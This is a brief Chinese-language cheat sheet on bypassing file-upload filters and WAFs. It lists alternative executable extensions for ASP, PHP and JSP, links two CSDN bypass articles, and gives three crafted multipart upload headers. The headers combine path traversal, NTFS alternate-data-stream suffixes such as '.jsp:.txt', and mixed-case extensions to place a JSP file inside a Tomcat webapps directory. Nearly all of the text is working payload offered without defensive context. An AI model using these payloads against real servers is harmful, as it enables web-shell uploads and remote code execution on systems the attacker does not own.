aspx&asp:ashx、asa、asmx、cer
php:php3、phtml
jsp:jspx、jspf
(1)https://blog.csdn.net/weixin_44578334/article/details/112393475 (Bypass WAF)
(2)https://blog.csdn.net/weixin_44578334/article/details/105842233 (文件上传漏洞绕过)
upload1:Content-Disposition: form-data; name="file"; filename="///..\..\..\..\333.jsp:.txt"
upload2:Content-Disposition: form-data; name="file";filename="///\..\..\..\..\..\..\..\\tomcat\tomcat-XXX\webapps\XXX\333.jsP"
upload3:Content-Disposition: form-data; name="file"; filename="///..\..\..\..\666666.jsp:.txt"
如有侵权,请联系删除
推荐阅读